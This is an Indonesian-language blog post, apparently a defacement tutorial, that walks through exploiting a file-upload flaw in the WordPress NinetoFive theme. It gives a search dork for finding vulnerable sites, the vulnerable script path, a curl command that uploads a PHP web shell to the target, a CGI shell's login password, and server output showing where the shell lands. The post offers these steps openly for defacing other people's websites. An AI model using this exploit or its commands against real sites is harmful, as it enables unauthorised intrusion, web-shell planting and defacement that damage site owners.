Cara Deface Remote Exploit Wordpress NinetoFive Themes

Assalamualaikum =))
Selamat berpacaran gan *eh :v
Oke langsung saja, kali ini saya akan share Cara Deface Remote Exploit NinetoFive Themes Wordpress
Kalo anda liat tutor sebelumnya harus make VPS kan, nah pasti repot :v
Ini saya akan menshare Menggunakan Remote Exploit, Caranya gimana ?? Cuma butuh CGI SHELL doank mas bro.

CGI SHELL : Here (password shell login: webr00t )

• Dork: inurl:/wp-content/themes/ninetofive
• Exploits: /wp-content/themes/ninetofive/scripts/doajaxfileupload.php
• Vulnerability: {"error":"No files were uploaded."}
• Command: curl -v -F "qqfile=@jiwa.php" "http://localhost/wp-content/themes/ninetofive/scripts/doajaxfileupload.php"

Note: 

Upload dulu shell yg mau kita Remote dari CGI shell ke Web Target

Masukan Command sesuai nama Shell dan site Target kalian jgn sampe Keliru sayank =))

Set-Cookie: PixelAttached_1=%2Fhome%2Fsciencef%2Fpublic_html%2Flocalhost%2Fwp-content%2Fuploads%2F2015%2F03%2Fjiwa_551a89b87c7d7.php; expires=Tue, 31-Mar-2015 12:49:12 

jiwa_551a89b87c7d7.php adalah Result Shell kita ( oia name shellnya bisa berubah gak nentu soalnya)

Result: /wp-content/uploads/2015/04/jiwa.php ( Lebih jelasnya liat di command Resultnya om )

Matursuwun nggo konco kenthelku Sinkaroid. =))

Tweet